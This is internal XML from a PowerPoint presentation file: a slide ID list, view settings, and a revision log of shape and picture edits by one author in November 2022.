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notesSlides/notesSlide1.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.notesSlide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6" r:id="rId2"/>
    <p:sldId id="305" r:id="rId3"/>
    <p:sldId id="426" r:id="rId4"/>
    <p:sldId id="351" r:id="rId5"/>
    <p:sldId id="352" r:id="rId6"/>
    <p:sldId id="353" r:id="rId7"/>
    <p:sldId id="334" r:id="rId8"/>
    <p:sldId id="354" r:id="rId9"/>
    <p:sldId id="355" r:id="rId10"/>
    <p:sldId id="357" r:id="rId11"/>
    <p:sldId id="358" r:id="rId12"/>
    <p:sldId id="359" r:id="rId13"/>
    <p:sldId id="363" r:id="rId14"/>
    <p:sldId id="374" r:id="rId15"/>
    <p:sldId id="375" r:id="rId16"/>
    <p:sldId id="376" r:id="rId17"/>
    <p:sldId id="440" r:id="rId18"/>
    <p:sldId id="428" r:id="rId19"/>
    <p:sldId id="441" r:id="rId20"/>
    <p:sldId id="361" r:id="rId21"/>
    <p:sldId id="362" r:id="rId22"/>
    <p:sldId id="316" r:id="rId23"/>
    <p:sldId id="429" r:id="rId24"/>
    <p:sldId id="364" r:id="rId25"/>
    <p:sldId id="365" r:id="rId26"/>
    <p:sldId id="366" r:id="rId27"/>
    <p:sldId id="368" r:id="rId28"/>
    <p:sldId id="369" r:id="rId29"/>
    <p:sldId id="370" r:id="rId30"/>
    <p:sldId id="367" r:id="rId31"/>
    <p:sldId id="371" r:id="rId32"/>
    <p:sldId id="448" r:id="rId33"/>
    <p:sldId id="447" r:id="rId34"/>
    <p:sldId id="445" r:id="rId35"/>
    <p:sldId id="446" r:id="rId36"/>
    <p:sldId id="372" r:id="rId37"/>
    <p:sldId id="444" r:id="rId38"/>
    <p:sldId id="474" r:id="rId39"/>
    <p:sldId id="469" r:id="rId40"/>
    <p:sldId id="471" r:id="rId41"/>
    <p:sldId id="472" r:id="rId42"/>
    <p:sldId id="475" r:id="rId43"/>
    <p:sldId id="378" r:id="rId44"/>
    <p:sldId id="476" r:id="rId45"/>
    <p:sldId id="433" r:id="rId46"/>
    <p:sldId id="434" r:id="rId47"/>
    <p:sldId id="431" r:id="rId48"/>
    <p:sldId id="435" r:id="rId49"/>
    <p:sldId id="436" r:id="rId50"/>
    <p:sldId id="477" r:id="rId51"/>
    <p:sldId id="478" r:id="rId52"/>
    <p:sldId id="452" r:id="rId53"/>
    <p:sldId id="449" r:id="rId54"/>
    <p:sldId id="450" r:id="rId55"/>
    <p:sldId id="451" r:id="rId56"/>
    <p:sldId id="379" r:id="rId57"/>
    <p:sldId id="467" r:id="rId58"/>
    <p:sldId id="380" r:id="rId59"/>
    <p:sldId id="479" r:id="rId60"/>
    <p:sldId id="578" r:id="rId61"/>
    <p:sldId id="579" r:id="rId62"/>
    <p:sldId id="443" r:id="rId63"/>
    <p:sldId id="442" r:id="rId64"/>
    <p:sldId id="430" r:id="rId65"/>
    <p:sldId id="356" r:id="rId66"/>
    <p:sldId id="381" r:id="rId67"/>
    <p:sldId id="382" r:id="rId68"/>
    <p:sldId id="383" r:id="rId69"/>
    <p:sldId id="458" r:id="rId70"/>
    <p:sldId id="457" r:id="rId71"/>
    <p:sldId id="456" r:id="rId72"/>
    <p:sldId id="455" r:id="rId73"/>
    <p:sldId id="454" r:id="rId74"/>
    <p:sldId id="453" r:id="rId75"/>
    <p:sldId id="438" r:id="rId76"/>
    <p:sldId id="459" r:id="rId77"/>
    <p:sldId id="460" r:id="rId78"/>
    <p:sldId id="466" r:id="rId79"/>
    <p:sldId id="465" r:id="rId80"/>
    <p:sldId id="464" r:id="rId81"/>
    <p:sldId id="468" r:id="rId82"/>
    <p:sldId id="463" r:id="rId83"/>
    <p:sldId id="386" r:id="rId84"/>
    <p:sldId id="338" r:id="rId8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59DC5D-AC53-4E73-AD78-FB1D3D6F072A}" v="211" dt="2022-11-09T21:32:27.3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489" autoAdjust="0"/>
  </p:normalViewPr>
  <p:slideViewPr>
    <p:cSldViewPr snapToGrid="0">
      <p:cViewPr varScale="1">
        <p:scale>
          <a:sx n="136" d="100"/>
          <a:sy n="136" d="100"/>
        </p:scale>
        <p:origin x="1192" y="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2159DC5D-AC53-4E73-AD78-FB1D3D6F072A}"/>
    <pc:docChg chg="undo custSel addSld modSld">
      <pc:chgData name="Daniel Schwarz" userId="5bb35bb8-905a-4742-88d9-33d9089732e7" providerId="ADAL" clId="{2159DC5D-AC53-4E73-AD78-FB1D3D6F072A}" dt="2022-11-09T21:32:27.399" v="529"/>
      <pc:docMkLst>
        <pc:docMk/>
      </pc:docMkLst>
      <pc:sldChg chg="modSp mod">
        <pc:chgData name="Daniel Schwarz" userId="5bb35bb8-905a-4742-88d9-33d9089732e7" providerId="ADAL" clId="{2159DC5D-AC53-4E73-AD78-FB1D3D6F072A}" dt="2022-11-06T15:39:42.143" v="5" actId="1036"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="2915792444" sldId="367"/>
        </pc:sldMkLst>
        <pc:spChg chg="mod">
          <ac:chgData name="Daniel Schwarz" userId="5bb35bb8-905a-4742-88d9-33d9089732e7" providerId="ADAL" clId="{2159DC5D-AC53-4E73-AD78-FB1D3D6F072A}" dt="2022-11-06T15:39:42.143" v="5" actId="1036"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="2915792444" sldId="367"/>
            <ac:spMk id="2" creationId="{3973471A-F3A0-48B3-B701-C5935C6C1207}"/>
          </ac:spMkLst>
        </pc:spChg>
      </pc:sldChg>
      <pc:sldChg chg="modSp">
        <pc:chgData name="Daniel Schwarz" userId="5bb35bb8-905a-4742-88d9-33d9089732e7" providerId="ADAL" clId="{2159DC5D-AC53-4E73-AD78-FB1D3D6F072A}" dt="2022-11-06T15:40:18.844" v="43" actId="20577"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="1896242820" sldId="378"/>
        </pc:sldMkLst>
        <pc:spChg chg="mod">
          <ac:chgData name="Daniel Schwarz" userId="5bb35bb8-905a-4742-88d9-33d9089732e7" providerId="ADAL" clId="{2159DC5D-AC53-4E73-AD78-FB1D3D6F072A}" dt="2022-11-06T15:40:18.844" v="43" actId="20577"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="1896242820" sldId="378"/>
            <ac:spMk id="3" creationId="{AE27958B-45DC-497F-9FD6-A98F1859E92D}"/>
          </ac:spMkLst>
        </pc:spChg>
      </pc:sldChg>
      <pc:sldChg chg="modSp mod modAnim">
        <pc:chgData name="Daniel Schwarz" userId="5bb35bb8-905a-4742-88d9-33d9089732e7" providerId="ADAL" clId="{2159DC5D-AC53-4E73-AD78-FB1D3D6F072A}" dt="2022-11-06T15:59:28.999" v="358" actId="27636"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="2692560093" sldId="379"/>
        </pc:sldMkLst>
        <pc:spChg chg="mod">
          <ac:chgData name="Daniel Schwarz" userId="5bb35bb8-905a-4742-88d9-33d9089732e7" providerId="ADAL" clId="{2159DC5D-AC53-4E73-AD78-FB1D3D6F072A}" dt="2022-11-06T15:59:28.999" v="358" actId="27636"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="2692560093" sldId="379"/>
            <ac:spMk id="3" creationId="{D515DC11-1567-4C09-A8AA-3CA5BBAC0ECE}"/>
          </ac:spMkLst>
        </pc:spChg>
      </pc:sldChg>
      <pc:sldChg chg="modSp mod">
        <pc:chgData name="Daniel Schwarz" userId="5bb35bb8-905a-4742-88d9-33d9089732e7" providerId="ADAL" clId="{2159DC5D-AC53-4E73-AD78-FB1D3D6F072A}" dt="2022-11-06T16:02:17.973" v="447"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="1371440257" sldId="430"/>
        </pc:sldMkLst>
        <pc:graphicFrameChg chg="mod modGraphic">
          <ac:chgData name="Daniel Schwarz" userId="5bb35bb8-905a-4742-88d9-33d9089732e7" providerId="ADAL" clId="{2159DC5D-AC53-4E73-AD78-FB1D3D6F072A}" dt="2022-11-06T16:02:17.973" v="447"/>
          <ac:graphicFrameMkLst>
            <pc:docMk/>
            <pc:sldMk cId="1371440257" sldId="430"/>
            <ac:graphicFrameMk id="5" creationId="{A69A059B-B37F-41C3-8C58-3F944E58EF29}"/>
          </ac:graphicFrameMkLst>
        </pc:graphicFrameChg>
      </pc:sldChg>
      <pc:sldChg chg="mod modShow">
        <pc:chgData name="Daniel Schwarz" userId="5bb35bb8-905a-4742-88d9-33d9089732e7" providerId="ADAL" clId="{2159DC5D-AC53-4E73-AD78-FB1D3D6F072A}" dt="2022-11-06T15:48:25.899" v="74" actId="729"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="3767213243" sldId="431"/>
        </pc:sldMkLst>
      </pc:sldChg>
      <pc:sldChg chg="modSp mod modShow">
        <pc:chgData name="Daniel Schwarz" userId="5bb35bb8-905a-4742-88d9-33d9089732e7" providerId="ADAL" clId="{2159DC5D-AC53-4E73-AD78-FB1D3D6F072A}" dt="2022-11-06T15:48:25.899" v="74" actId="729"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="827526027" sldId="433"/>
        </pc:sldMkLst>
        <pc:spChg chg="mod">
          <ac:chgData name="Daniel Schwarz" userId="5bb35bb8-905a-4742-88d9-33d9089732e7" providerId="ADAL" clId="{2159DC5D-AC53-4E73-AD78-FB1D3D6F072A}" dt="2022-11-06T15:43:56.819" v="66" actId="20577"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="827526027" sldId="433"/>
            <ac:spMk id="2" creationId="{69884D88-76C5-4472-83C1-22E67C73AFF3}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="mod">
          <ac:chgData name="Daniel Schwarz" userId="5bb35bb8-905a-4742-88d9-33d9089732e7" providerId="ADAL" clId="{2159DC5D-AC53-4E73-AD78-FB1D3D6F072A}" dt="2022-11-06T15:43:53.189" v="64" actId="1076"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="827526027" sldId="433"/>
            <ac:spMk id="3" creationId="{EC324661-8184-49C1-967B-3F931AEA285E}"/>
          </ac:spMkLst>
        </pc:spChg>
      </pc:sldChg>
      <pc:sldChg chg="mod modShow">
        <pc:chgData name="Daniel Schwarz" userId="5bb35bb8-905a-4742-88d9-33d9089732e7" providerId="ADAL" clId="{2159DC5D-AC53-4E73-AD78-FB1D3D6F072A}" dt="2022-11-06T15:48:25.899" v="74" actId="729"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="1185923952" sldId="434"/>
        </pc:sldMkLst>
      </pc:sldChg>
      <pc:sldChg chg="mod modShow">
        <pc:chgData name="Daniel Schwarz" userId="5bb35bb8-905a-4742-88d9-33d9089732e7" providerId="ADAL" clId="{2159DC5D-AC53-4E73-AD78-FB1D3D6F072A}" dt="2022-11-06T15:48:25.899" v="74" actId="729"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="3855353301" sldId="435"/>
        </pc:sldMkLst>
      </pc:sldChg>
      <pc:sldChg chg="mod modShow">
        <pc:chgData name="Daniel Schwarz" userId="5bb35bb8-905a-4742-88d9-33d9089732e7" providerId="ADAL" clId="{2159DC5D-AC53-4E73-AD78-FB1D3D6F072A}" dt="2022-11-06T15:48:25.899" v="74" actId="729"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="4137273230" sldId="436"/>
        </pc:sldMkLst>
      </pc:sldChg>
      <pc:sldChg chg="modSp mod">
        <pc:chgData name="Daniel Schwarz" userId="5bb35bb8-905a-4742-88d9-33d9089732e7" providerId="ADAL" clId="{2159DC5D-AC53-4E73-AD78-FB1D3D6F072A}" dt="2022-11-06T16:02:13.502" v="446"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="2700238070" sldId="442"/>
        </pc:sldMkLst>
        <pc:graphicFrameChg chg="mod modGraphic">
          <ac:chgData name="Daniel Schwarz" userId="5bb35bb8-905a-4742-88d9-33d9089732e7" providerId="ADAL" clId="{2159DC5D-AC53-4E73-AD78-FB1D3D6F072A}" dt="2022-11-06T16:02:13.502" v="446"/>
          <ac:graphicFrameMkLst>
            <pc:docMk/>
            <pc:sldMk cId="2700238070" sldId="442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2159DC5D-AC53-4E73-AD78-FB1D3D6F072A}" dt="2022-11-06T16:02:04.114" v="445" actId="20577"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="864901960" sldId="443"/>
        </pc:sldMkLst>
        <pc:graphicFrameChg chg="modGraphic">
          <ac:chgData name="Daniel Schwarz" userId="5bb35bb8-905a-4742-88d9-33d9089732e7" providerId="ADAL" clId="{2159DC5D-AC53-4E73-AD78-FB1D3D6F072A}" dt="2022-11-06T16:02:04.114" v="445" actId="20577"/>
          <ac:graphicFrameMkLst>
            <pc:docMk/>
            <pc:sldMk cId="864901960" sldId="443"/>
            <ac:graphicFrameMk id="5" creationId="{A69A059B-B37F-41C3-8C58-3F944E58EF29}"/>
          </ac:graphicFrameMkLst>
        </pc:graphicFrameChg>
      </pc:sldChg>
      <pc:sldChg chg="modSp mod modAnim">
        <pc:chgData name="Daniel Schwarz" userId="5bb35bb8-905a-4742-88d9-33d9089732e7" providerId="ADAL" clId="{2159DC5D-AC53-4E73-AD78-FB1D3D6F072A}" dt="2022-11-06T15:58:38.821" v="355" actId="404"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="2681269238" sldId="449"/>
        </pc:sldMkLst>
        <pc:spChg chg="mod">
          <ac:chgData name="Daniel Schwarz" userId="5bb35bb8-905a-4742-88d9-33d9089732e7" providerId="ADAL" clId="{2159DC5D-AC53-4E73-AD78-FB1D3D6F072A}" dt="2022-11-06T15:56:24.330" v="291" actId="1076"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="2681269238" sldId="449"/>
            <ac:spMk id="5" creationId="{5DBAAFDF-7358-41AE-872D-6BA75EACB02A}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="mod">
          <ac:chgData name="Daniel Schwarz" userId="5bb35bb8-905a-4742-88d9-33d9089732e7" providerId="ADAL" clId="{2159DC5D-AC53-4E73-AD78-FB1D3D6F072A}" dt="2022-11-06T15:53:28.527" v="277" actId="1036"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="2681269238" sldId="449"/>
            <ac:spMk id="7" creationId="{67E358CD-E5C9-4776-B994-1F375DE65E2B}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="mod">
          <ac:chgData name="Daniel Schwarz" userId="5bb35bb8-905a-4742-88d9-33d9089732e7" providerId="ADAL" clId="{2159DC5D-AC53-4E73-AD78-FB1D3D6F072A}" dt="2022-11-06T15:53:28.527" v="277" actId="1036"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="2681269238" sldId="449"/>
            <ac:spMk id="10" creationId="{8BE12CAE-774C-4EE6-B459-16CC21E6A446}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="mod">
          <ac:chgData name="Daniel Schwarz" userId="5bb35bb8-905a-4742-88d9-33d9089732e7" providerId="ADAL" clId="{2159DC5D-AC53-4E73-AD78-FB1D3D6F072A}" dt="2022-11-06T15:53:28.527" v="277" actId="1036"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="2681269238" sldId="449"/>
            <ac:spMk id="11" creationId="{787E79D1-A652-4E15-B872-0F9691D5050B}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="mod">
          <ac:chgData name="Daniel Schwarz" userId="5bb35bb8-905a-4742-88d9-33d9089732e7" providerId="ADAL" clId="{2159DC5D-AC53-4E73-AD78-FB1D3D6F072A}" dt="2022-11-06T15:58:38.821" v="355" actId="404"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="2681269238" sldId="449"/>
            <ac:spMk id="17" creationId="{6AF5932F-82A1-4BD6-89FD-6048480F8273}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:picChg chg="mod">
          <ac:chgData name="Daniel Schwarz" userId="5bb35bb8-905a-4742-88d9-33d9089732e7" providerId="ADAL" clId="{2159DC5D-AC53-4E73-AD78-FB1D3D6F072A}" dt="2022-11-06T15:53:28.527" v="277" actId="1036"/>
          <ac:picMkLst>
            <pc:docMk/>
            <pc:sldMk cId="2681269238" sldId="449"/>
            <ac:picMk id="4" creationId="{0F754F1F-6F67-4002-884D-423F226FFB73}"/>
          </ac:picMkLst>
        </pc:picChg>
        <pc:cxnChg chg="mod">
          <ac:chgData name="Daniel Schwarz" userId="5bb35bb8-905a-4742-88d9-33d9089732e7" providerId="ADAL" clId="{2159DC5D-AC53-4E73-AD78-FB1D3D6F072A}" dt="2022-11-06T15:53:28.527" v="277" actId="1036"/>
          <ac:cxnSpMkLst>
            <pc:docMk/>
            <pc:sldMk cId="2681269238" sldId="449"/>
            <ac:cxnSpMk id="9" creationId="{EB804EC5-9538-4194-87B4-D159A64CD2FE}"/>
          </ac:cxnSpMkLst>
        </pc:cxnChg>
        <pc:cxnChg chg="mod">
          <ac:chgData name="Daniel Schwarz" userId="5bb35bb8-905a-4742-88d9-33d9089732e7" providerId="ADAL" clId="{2159DC5D-AC53-4E73-AD78-FB1D3D6F072A}" dt="2022-11-06T15:53:28.527" v="277" actId="1036"/>
          <ac:cxnSpMkLst>
            <pc:docMk/>
            <pc:sldMk cId="2681269238" sldId="449"/>
            <ac:cxnSpMk id="12" creationId="{FC584904-79F0-4569-ACEC-8B7EFD461005}"/>
          </ac:cxnSpMkLst>
        </pc:cxnChg>
      </pc:sldChg>
      <pc:sldChg chg="addSp delSp modSp mod delAnim modAnim">
        <pc:chgData name="Daniel Schwarz" userId="5bb35bb8-905a-4742-88d9-33d9089732e7" providerId="ADAL" clId="{2159DC5D-AC53-4E73-AD78-FB1D3D6F072A}" dt="2022-11-06T15:57:01.051" v="345" actId="1037"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="2610968194" sldId="450"/>
        </pc:sldMkLst>
        <pc:spChg chg="del">
          <ac:chgData name="Daniel Schwarz" userId="5bb35bb8-905a-4742-88d9-33d9089732e7" providerId="ADAL" clId="{2159DC5D-AC53-4E73-AD78-FB1D3D6F072A}" dt="2022-11-06T15:54:49.827" v="281" actId="478"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="2610968194" sldId="450"/>
            <ac:spMk id="3" creationId="{AA2460C2-D09C-4373-8FBF-2037BA25F659}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="add mod">
          <ac:chgData name="Daniel Schwarz" userId="5bb35bb8-905a-4742-88d9-33d9089732e7" providerId="ADAL" clId="{2159DC5D-AC53-4E73-AD78-FB1D3D6F072A}" dt="2022-11-06T15:57:01.051" v="345" actId="1037"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="2610968194" sldId="450"/>
            <ac:spMk id="5" creationId="{1FEE8C9A-466B-0328-9FDF-C28067FE0E61}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="del">
          <ac:chgData name="Daniel Schwarz" userId="5bb35bb8-905a-4742-88d9-33d9089732e7" providerId="ADAL" clId="{2159DC5D-AC53-4E73-AD78-FB1D3D6F072A}" dt="2022-11-06T15:54:49.827" v="281" actId="478"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="2610968194" sldId="450"/>
            <ac:spMk id="6" creationId="{1AA06D5F-8863-4270-AA3F-66EF92F296F3}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="del">
          <ac:chgData name="Daniel Schwarz" userId="5bb35bb8-905a-4742-88d9-33d9089732e7" providerId="ADAL" clId="{2159DC5D-AC53-4E73-AD78-FB1D3D6F072A}" dt="2022-11-06T15:54:49.827" v="281" actId="478"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="2610968194" sldId="450"/>
            <ac:spMk id="7" creationId="{9E2E3438-C9F3-472C-B2DA-2C820B89B0C1}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="add mod">
          <ac:chgData name="Daniel Schwarz" userId="5bb35bb8-905a-4742-88d9-33d9089732e7" providerId="ADAL" clId="{2159DC5D-AC53-4E73-AD78-FB1D3D6F072A}" dt="2022-11-06T15:55:46.599" v="286" actId="1076"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="2610968194" sldId="450"/>
            <ac:spMk id="8" creationId="{C692DD98-F1C6-E24D-A321-A1994DFC7A06}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="add mod">
          <ac:chgData name="Daniel Schwarz" userId="5bb35bb8-905a-4742-88d9-33d9089732e7" providerId="ADAL" clId="{2159DC5D-AC53-4E73-AD78-FB1D3D6F072A}" dt="2022-11-06T15:55:46.599" v="286" actId="1076"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="2610968194" sldId="450"/>
            <ac:spMk id="11" creationId="{D78B9861-C7AB-ACF2-DD8E-9D70BDFE9C34}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:picChg chg="del">
          <ac:chgData name="Daniel Schwarz" userId="5bb35bb8-905a-4742-88d9-33d9089732e7" providerId="ADAL" clId="{2159DC5D-AC53-4E73-AD78-FB1D3D6F072A}" dt="2022-11-06T15:54:49.827" v="281" actId="478"/>
          <ac:picMkLst>
            <pc:docMk/>
            <pc:sldMk cId="2610968194" sldId="450"/>
            <ac:picMk id="4" creationId="{92565BD4-9D9A-4A9C-8042-784FC3CE0078}"/>
          </ac:picMkLst>
        </pc:picChg>
        <pc:picChg chg="add mod">
          <ac:chgData name="Daniel Schwarz" userId="5bb35bb8-905a-4742-88d9-33d9089732e7" providerId="ADAL" clId="{2159DC5D-AC53-4E73-AD78-FB1D3D6F072A}" dt="2022-11-06T15:55:46.599" v="286" actId="1076"/>
          <ac:picMkLst>
            <pc:docMk/>
            <pc:sldMk cId="2610968194" sldId="450"/>
            <ac:picMk id="9" creationId="{A55B7396-974D-3727-7C4A-0D4871FBF570}"/>
          </ac:picMkLst>
        </pc:picChg>
        <pc:picChg chg="add mod">
          <ac:chgData name="Daniel Schwarz" userId="5bb35bb8-905a-4742-88d9-33d9089732e7" providerId="ADAL" clId="{2159DC5D-AC53-4E73-AD78-FB1D3D6F072A}" dt="2022-11-06T15:55:46.599" v="286" actId="1076"/>
          <ac:picMkLst>
            <pc:docMk/>
            <pc:sldMk cId="2610968194" sldId="450"/>
            <ac:picMk id="10" creationId="{9B0E9D9B-2113-E9E6-8B43-05CDA7161A85}"/>
          </ac:picMkLst>
        </pc:picChg>
      </pc:sldChg>
      <pc:sldChg chg="modSp mod">
        <pc:chgData name="Daniel Schwarz" userId="5bb35bb8-905a-4742-88d9-33d9089732e7" providerId="ADAL" clId="{2159DC5D-AC53-4E73-AD78-FB1D3D6F072A}" dt="2022-11-06T15:57:30.388" v="350" actId="1076"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="2826770376" sldId="451"/>
        </pc:sldMkLst>
        <pc:spChg chg="mod">
          <ac:chgData name="Daniel Schwarz" userId="5bb35bb8-905a-4742-88d9-33d9089732e7" providerId="ADAL" clId="{2159DC5D-AC53-4E73-AD78-FB1D3D6F072A}" dt="2022-11-06T15:57:30.388" v="350" actId="1076"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="2826770376" sldId="451"/>
            <ac:spMk id="3" creationId="{FCD3317A-6E90-4478-8908-28106AFE985A}"/>
          </ac:spMkLst>
        </pc:spChg>
      </pc:sldChg>
      <pc:sldChg chg="addSp delSp modSp add mod addAnim delAnim modAnim">
        <pc:chgData name="Daniel Schwarz" userId="5bb35bb8-905a-4742-88d9-33d9089732e7" providerId="ADAL" clId="{2159DC5D-AC53-4E73-AD78-FB1D3D6F072A}" dt="2022-11-09T20:30:15.651" v="472"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="4203979413" sldId="476"/>
        </pc:sldMkLst>
        <pc:spChg chg="mod">
          <ac:chgData name="Daniel Schwarz" userId="5bb35bb8-905a-4742-88d9-33d9089732e7" providerId="ADAL" clId="{2159DC5D-AC53-4E73-AD78-FB1D3D6F072A}" dt="2022-11-06T15:47:35" v="68"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="4203979413" sldId="476"/>
            <ac:spMk id="2" creationId="{8D3D411E-4ED3-98C6-C63A-BE8438F2A6C0}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="mod">
          <ac:chgData name="Daniel Schwarz" userId="5bb35bb8-905a-4742-88d9-33d9089732e7" providerId="ADAL" clId="{2159DC5D-AC53-4E73-AD78-FB1D3D6F072A}" dt="2022-11-06T15:47:44.357" v="69" actId="20577"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="4203979413" sldId="476"/>
            <ac:spMk id="3" creationId="{A33F1E3E-6FCE-9911-CDFC-50176D670DC7}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="mod">
          <ac:chgData name="Daniel Schwarz" userId="5bb35bb8-905a-4742-88d9-33d9089732e7" providerId="ADAL" clId="{2159DC5D-AC53-4E73-AD78-FB1D3D6F072A}" dt="2022-11-06T15:48:03.913" v="73" actId="1036"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="4203979413" sldId="476"/>
            <ac:spMk id="19" creationId="{CC07461B-94FA-CF27-0F6C-DAF650076C3B}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:picChg chg="del">
          <ac:chgData name="Daniel Schwarz" userId="5bb35bb8-905a-4742-88d9-33d9089732e7" providerId="ADAL" clId="{2159DC5D-AC53-4E73-AD78-FB1D3D6F072A}" dt="2022-11-09T20:28:32.891" v="457" actId="478"/>
          <ac:picMkLst>
            <pc:docMk/>
            <pc:sldMk cId="4203979413" sldId="476"/>
            <ac:picMk id="5" creationId="{3D9E8A3E-2CEB-B1BD-ABD8-78DFFCC8E034}"/>
          </ac:picMkLst>
        </pc:picChg>
        <pc:picChg chg="add del mod">
          <ac:chgData name="Daniel Schwarz" userId="5bb35bb8-905a-4742-88d9-33d9089732e7" providerId="ADAL" clId="{2159DC5D-AC53-4E73-AD78-FB1D3D6F072A}" dt="2022-11-09T20:27:10.376" v="452" actId="22"/>
          <ac:picMkLst>
            <pc:docMk/>
            <pc:sldMk cId="4203979413" sldId="476"/>
            <ac:picMk id="6" creationId="{58450142-CEB2-4599-C326-BAF0255BB15C}"/>
          </ac:picMkLst>
        </pc:picChg>
        <pc:picChg chg="add del mod">
          <ac:chgData name="Daniel Schwarz" userId="5bb35bb8-905a-4742-88d9-33d9089732e7" providerId="ADAL" clId="{2159DC5D-AC53-4E73-AD78-FB1D3D6F072A}" dt="2022-11-09T20:29:34.041" v="466" actId="1076"/>
          <ac:picMkLst>
            <pc:docMk/>
            <pc:sldMk cId="4203979413" sldId="476"/>
            <ac:picMk id="7" creationId="{B40CA457-CE14-25A9-11FF-9379B75A77F2}"/>
          </ac:picMkLst>
        </pc:picChg>
        <pc:picChg chg="add mod">
          <ac:chgData name="Daniel Schwarz" userId="5bb35bb8-905a-4742-88d9-33d9089732e7" providerId="ADAL" clId="{2159DC5D-AC53-4E73-AD78-FB1D3D6F072A}" dt="2022-11-09T20:27:26.725" v="456" actId="1076"/>
          <ac:picMkLst>
            <pc:docMk/>
            <pc:sldMk cId="4203979413" sldId="476"/>
            <ac:picMk id="9" creationId="{BE15CC14-2F54-7166-B5BC-4C517794B5E9}"/>
          </ac:picMkLst>
        </pc:picChg>
        <pc:picChg chg="add mod">
          <ac:chgData name="Daniel Schwarz" userId="5bb35bb8-905a-4742-88d9-33d9089732e7" providerId="ADAL" clId="{2159DC5D-AC53-4E73-AD78-FB1D3D6F072A}" dt="2022-11-09T20:28:39.360" v="460" actId="1076"/>
          <ac:picMkLst>
            <pc:docMk/>
            <pc:sldMk cId="4203979413" sldId="476"/>
            <ac:picMk id="11" creationId="{501F256A-2589-4434-8A35-49E6E6591E48}"/>
          </ac:picMkLst>
        </pc:picChg>
        <pc:picChg chg="add del mod">
          <ac:chgData name="Daniel Schwarz" userId="5bb35bb8-905a-4742-88d9-33d9089732e7" providerId="ADAL" clId="{2159DC5D-AC53-4E73-AD78-FB1D3D6F072A}" dt="2022-11-09T20:29:34.041" v="466" actId="1076"/>
          <ac:picMkLst>
            <pc:docMk/>
            <pc:sldMk cId="4203979413" sldId="476"/>
            <ac:picMk id="13" creationId="{8DA215A7-952F-A2EF-C743-D13AA793C03B}"/>
          </ac:picMkLst>
        </pc:picChg>
        <pc:picChg chg="add mod">
          <ac:chgData name="Daniel Schwarz" userId="5bb35bb8-905a-4742-88d9-33d9089732e7" providerId="ADAL" clId="{2159DC5D-AC53-4E73-AD78-FB1D3D6F072A}" dt="2022-11-09T20:29:28.728" v="465" actId="1076"/>
          <ac:picMkLst>
            <pc:docMk/>
            <pc:sldMk cId="4203979413" sldId="476"/>
            <ac:picMk id="14" creationId="{F260DEC3-426F-92BB-9B7D-091AA4919BA0}"/>
          </ac:picMkLst>
        </pc:picChg>
        <pc:picChg chg="del">
          <ac:chgData name="Daniel Schwarz" userId="5bb35bb8-905a-4742-88d9-33d9089732e7" providerId="ADAL" clId="{2159DC5D-AC53-4E73-AD78-FB1D3D6F072A}" dt="2022-11-09T20:29:19.091" v="461" actId="478"/>
          <ac:picMkLst>
            <pc:docMk/>
            <pc:sldMk cId="4203979413" sldId="476"/>
